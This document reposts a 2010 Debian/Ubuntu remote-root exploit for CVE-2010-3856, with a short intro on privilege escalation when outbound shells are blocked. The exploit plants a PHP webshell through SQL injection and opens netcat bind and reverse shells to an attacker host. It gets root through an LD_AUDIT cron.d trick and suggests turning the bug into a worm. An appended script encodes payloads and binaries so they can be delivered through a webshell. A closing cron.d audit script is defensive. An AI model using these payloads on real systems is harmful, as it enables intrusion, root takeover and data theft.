Linux local privilege escalation in a non-interactive environment: approach and reflections (linux localroot exploit)
When iptables is locked down so tightly that no ICMP, UDP or TCP bind shell or connect-back shell can get through, yet a local privilege escalation is still needed, one option is to get root, switch iptables off, and then see whether the access controls can be bypassed (of course, if the other side uses a hardware firewall, nothing below will solve that). In this scenario the non-interactive local privilege escalation method below is worth consulting; other linux localroot exploits may be usable the same way, and practice is the real test. Note also that root is not always required: as nobody, without an interactive shell, a great deal can still be done. On the defensive side, this scenario should make us reflect: 1. Defensive controls must be separated from the system they defend, so that even a successful root does not let the attacker pivot quickly. 2. Do we have sufficient capability to prevent localroot exploits before the fact, to detect them while they happen, and to assess the damage and collect evidence afterwards?

Debian <=5.0.6 / Ubuntu <=10.04 Webshell-Remote-Root

# Exploit Title: Debian <=5.0.6 /Ubuntu <=10.04 Webshell-Remote-Root
# Date: 24-10-2010
# Author: jmit
# Mail: fhausberger[at]gmail[dot]com
# Tested on: Debian 5.0.6
# CVE: CVE-2010-3856

--------------
| DISCLAIMER |
--------------
# IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.

---------
| ABOUT |
---------
Debian/Ubuntu remote root exploitation example (GNU dynamic linker DSO vuln). See (http://www.exploit-db.com/exploits/15304/). Should work on other linux distros too.

--------------
| BACKGROUND |
--------------
Typically it isn't possible to use a suidshell or modify /etc/passwd directly after webshell access (user nobody) to gain root access. But with the DSO vuln we can launch commands as root and we can create a socket and connect to the user or set up a bindshell.

-----------
| EXPLOIT |
-----------
After you have found a SQL-Injection vuln you can create a php backdoor. This is typically possible with a select into dumpfile/outfile statement. The value is a simple <? passthru($_GET['c']); ?> backdoor.
---
DROP TABLE IF EXISTS `fm`;
CREATE TABLE `fm` ( `fm` longblob ) TYPE=MyISAM;
insert into fm (fm) values (0x3c3f20706173737468727528245f4745545b2763275d293b203f3e);
select fm from fm into dumpfile "/opt/lampp/htdocs/xampp_backup.php";
drop table fm;
flush logs;
---
Now you can connect to the server and create a connection with telnet, nc, write a binary with perl -e 'print "\x41\x42\x43\x44"', echo -en "\x41\x42\x43\x44", ... If direct shell access isn't possible you can use php code to create your own binary with php fwrite:
---
<?php
$File = "/tmp/nc";
$Handle = fopen($File, "w");
$Data = "\x41\x42\x43\x44";
fwrite($Handle, $Data);
fclose($Handle);
?>
---
Now use
Bind-Shell:    http://victimip/xampp_backup.php?c=nc -l -p 9999 -e /bin/bash
Reverse-Shell: http://victimip/xampp_backup.php?c=/bin/nc attackerip 9999 | /bin/bash
in your web browser and connect to your shell
$ nc victimip 9999
id
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
---
Now let's exploit the DSO vuln.
You need umask 0 for correct rw-rw-rw creation of the exploit file /etc/cron.d/exploit
$ umask 0
This is the shellscript for the cron.d entry.
Bind-Shell:    $ echo -e "/bin/nc -l -p 79 -e /bin/bash" > /tmp/exploit.sh
Reverse-Shell: $ echo -e "/bin/nc localhost 8888 | /bin/bash" > /tmp/exploit.sh
Now make your shellscript executable for cron:
$ chmod u+x /tmp/exploit.sh
Create a rw-rw-rw file in the cron directory using the setuid ping program:
$ LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping
Launch every minute a suid root shell
$ echo -e "*/1 * * * * root /tmp/exploit.sh" > /etc/cron.d/exploit
Now you have a root shell every minute.
$ nc attackerip 79
id
uid=0(root) gid=0(root) groups=0(root)

-------------------
| EXPLOIT oneline |
-------------------
echo -e "/bin/nc -l -p 79 -e /bin/bash" > /tmp/exploit.sh;/bin/chmod 0744 /tmp/exploit.sh;umask 0;LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping;echo -e "*/1 * * * * root /tmp/exploit.sh" > /etc/cron.d/exploit
$ nc attackerip 79
id
uid=0(root) gid=0(root) groups=0(root)

------------------------------
| EXPLOIT from webshell only |
------------------------------
http://victimip/xampp_backup.php?c=echo -e "/bin/nc -l -p 79 -e /bin/bash" > /tmp/exploit.sh
http://victimip/xampp_backup.php?c=/bin/chmod 0744 /tmp/exploit.sh
http://victimip/xampp_backup.php?c=umask 0;LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping
http://victimip/xampp_backup.php?c=echo -e "*/1 * * * * root /tmp/exploit.sh" > /etc/cron.d/exploit
$ nc attackerip 79
id
uid=0(root) gid=0(root) groups=0(root)

---------------------------------
| EXPLOIT from webshell oneline |
---------------------------------
http://victimip/xampp_backup.php?c=echo -e "/bin/nc -l -p 79 -e /bin/bash" > /tmp/exploit.sh;/bin/chmod 0744 /tmp/exploit.sh;umask 0;LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping;echo -e "*/1 * * * * root /tmp/exploit.sh" > /etc/cron.d/exploit
$ nc attackerip 79
id
uid=0(root) gid=0(root) groups=0(root)

---------
| IDEAS |
---------
Looks like a wormable bug. The url-obfuscated (IDS/IPS) worm searches for SQLI/BSQLI bugs or remote code execution bugs. Then the worm injects the evil url and does the same for other ips. It installs a rootkit-bot and the game is over.

© Offensive Security 2010
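The EXPLOIT section above relies on two encoding tricks that it only sketches: the PHP backdoor is written through the SQL injection as a hex literal (so no quoting is needed inside the injected statement), and a binary such as nc is dropped onto the box with perl -e / echo -en because the nobody webshell has no upload channel. The script below is an added example, not part of jmit's exploit or of the original post, that works both tricks out for arbitrary input. It encodes any payload as a MySQL 0x literal and builds the DUMPFILE statement, and it turns any binary into a sequence of printf commands of a chosen chunk size, each of which fits into one ?c= request; octal escapes are used because POSIX printf does not guarantee \x escapes and dash's echo has no -e at all. The target paths, the 16-byte chunk size and the sample binary (every byte value 0..255, constructed here so that NUL, quotes, backslash and newline are all exercised) are assumptions for the demonstration.

```shell
#!/bin/sh
# Added example (not from the original post or jmit's exploit): getting a payload onto a
# host through channels that cannot carry raw bytes, i.e. a SQL injection point and a
# GET-parameter webshell. Only od, tr, xargs, sed, cmp and printf are used (all POSIX).

# MySQL hex literal. SELECT 0x... INTO DUMPFILE writes the decoded bytes verbatim, which
# is why the exploit text delivers the PHP backdoor this way.
sql_hex_literal() {
    printf '0x%s' "$(printf '%s' "$1" | od -An -tx1 -v | tr -d ' \n')"
}

# Full statement; needs the FILE privilege and a secure_file_priv that allows the path.
# Argument 2 is the web-root path to write to (hypothetical in the demonstration).
dumpfile_statement() {
    printf "SELECT %s INTO DUMPFILE '%s';" "$(sql_hex_literal "$1")" "$2"
}

# Emit one "printf '\ooo\ooo...' >> remote_path" command per chunk of $2 bytes of file $1.
# Each output line is sent as one webshell request (percent-encode it: space, ', > and %
# are not URL-safe). Octal escapes are portable where \x escapes and echo -e are not.
binary_to_printf_cmds() {
    od -An -to1 -v "$1" | xargs -n "$2" | while IFS= read -r octets; do
        [ -n "$octets" ] || continue
        printf "printf '\\\\%s' >> %s\n" "$(printf '%s' "$octets" | sed 's/ /\\/g')" "$3"
    done
}

# Constructed sample input: every byte value 0..255 exactly once (256 bytes).
make_sample_binary() {
    i=0
    while [ "$i" -lt 256 ]; do
        printf "\\$(printf '%03o' "$i")"
        i=$((i + 1))
    done > "$1"
}

# Replay the generated commands locally (what the webshell would do remotely) and
# compare the result with the original; returns 0 when the copy is byte-identical.
roundtrip_ok() {
    binary_to_printf_cmds "$1" "$2" "$3" | sh && cmp -s "$1" "$3"
}

# Standalone use: sh thisfile.sh <local binary> <chunk bytes> <remote path>
if [ $# -eq 3 ]; then
    binary_to_printf_cmds "$1" "$2" "$3"
fi
```

Feeding the exploit's own backdoor `<? passthru($_GET['c']); ?>` to sql_hex_literal reproduces the literal 0x3c3f2070... used in the CREATE TABLE / INSERT sequence above, which is a quick way to check a payload before injecting it. The chunk size is bounded by what the web server and any proxy accept as a URL length, and a 64 KB nc is roughly 4,000 requests at 16 bytes per chunk, so in practice the chunk is made as large as the URL limit allows.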
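The closing question of the introduction, whether we can detect a localroot while it happens and reconstruct it afterwards, deserves a concrete answer for this particular chain. The "before the fact" part is simply the vendor glibc update for CVE-2010-3856. For the "after the fact" part, the script below is an added example, not part of the original post or of jmit's exploit, that audits a cron.d directory for exactly the artifacts the chain above leaves behind: a group- or world-writable file in /etc/cron.d (the rw-rw-rw- result of umask 0 plus PCPROFILE_OUTPUT), a file not owned by root, a root job whose program lives in /tmp, /var/tmp or /dev/shm, and a job program that is itself world-writable or owned by someone else. Because this is typically run against a mounted image or an extracted copy of the evidence, the expected owner and the filesystem root are parameters rather than assumed to be root and /. The fixture (one Debian-style anacron entry and the exploit's own cron.d file) is constructed here for the demonstration.

```shell
#!/bin/sh
# Added example (not from the original post): check a cron.d directory for the artifacts
# the LD_AUDIT/cron.d privilege escalation above leaves behind.
#   audit_cron_d <cron.d dir> [expected owner, default root] [filesystem root, default ""]
# e.g. audit_cron_d /mnt/image/etc/cron.d root /mnt/image
# Findings are printed one per line; the exit status is 1 if anything was found.
audit_cron_d() {
    dir=$1; owner=${2:-root}; fsroot=${3:-}
    found=0
    for f in "$dir"/*; do
        [ -f "$f" ] || continue
        # cron.d files should be 0644 and root-owned. umask 0 + PCPROFILE_OUTPUT creates
        # rw-rw-rw-, so a group- or world-writable file is the primary indicator.
        if [ -n "$(find "$f" \( -perm -020 -o -perm -002 \) -print)" ]; then
            echo "$f: group/world-writable cron.d file"; found=$((found + 1))
        fi
        if [ -n "$(find "$f" ! -user "$owner" -print)" ]; then
            echo "$f: not owned by $owner"; found=$((found + 1))
        fi
        while IFS= read -r line || [ -n "$line" ]; do
            set -f; set -- $line; set +f      # split into fields without globbing the '*'s
            [ $# -gt 0 ] || continue           # blank line
            case $1 in '#'*|[A-Za-z_]*=*) continue ;; esac   # comment or VAR=value line
            case $1 in
                @*) [ $# -ge 3 ] || continue; user=$2; shift 2 ;;   # "@reboot user cmd"
                *)  [ $# -ge 7 ] || continue; user=$6; shift 6 ;;   # "m h dom mon dow user cmd"
            esac
            prog=$1
            # A job whose program sits in a world-writable directory is what the exploit
            # installs (/tmp/exploit.sh): any unprivileged user could have planted it.
            case $prog in
                /tmp/*|/var/tmp/*|/dev/shm/*)
                    echo "$f: job as $user runs $prog from a world-writable location"
                    found=$((found + 1)) ;;
            esac
            # Even outside /tmp, a program run by cron must not be writable or foreign-owned.
            case $prog in /*)
                target=$fsroot$prog
                if [ -f "$target" ] && [ -n "$(find "$target" \( -perm -002 -o ! -user "$owner" \) -print)" ]; then
                    echo "$f: job as $user runs $prog, which is world-writable or not owned by $owner"
                    found=$((found + 1))
                fi ;;
            esac
        done < "$f"
    done
    [ "$found" -eq 0 ]
}

# Constructed fixture under a fake filesystem root $1: one legitimate entry plus the file
# and script the step-by-step exploit writes (umask 0, echo, chmod u+x gives 0766).
make_sample_cron_d() {
    mkdir -p "$1/etc/cron.d" "$1/tmp"
    printf '# legitimate Debian-style entry\nSHELL=/bin/sh\n25 6 * * * root test -x /usr/sbin/anacron || /usr/sbin/run-parts --report /etc/cron.daily\n' > "$1/etc/cron.d/anacron"
    chmod 0644 "$1/etc/cron.d/anacron"
    printf '/bin/nc -l -p 79 -e /bin/bash\n' > "$1/tmp/exploit.sh"
    chmod 0766 "$1/tmp/exploit.sh"
    printf '*/1 * * * * root /tmp/exploit.sh\n' > "$1/etc/cron.d/exploit"
    chmod 0666 "$1/etc/cron.d/exploit"
}

# Standalone use against a live host or an image: sh thisfile.sh /etc/cron.d [owner] [fsroot]
if [ $# -ge 1 ]; then
    audit_cron_d "$1" "${2:-root}" "${3:-}"
fi
```

Against the fixture the exploit file produces three findings and the anacron file none. Two caveats follow from the exploit itself: the oneline variant creates exploit.sh with chmod 0744, so only the ownership check (nobody rather than root) fires on the script, and once the attacker has root they can delete both files, after which the cron daemon's own syslog line for the job (the `(root) CMD (/tmp/exploit.sh)` entry) is what remains, which is the practical reason behind the introduction's first point about keeping logs on a system the attacker cannot reach.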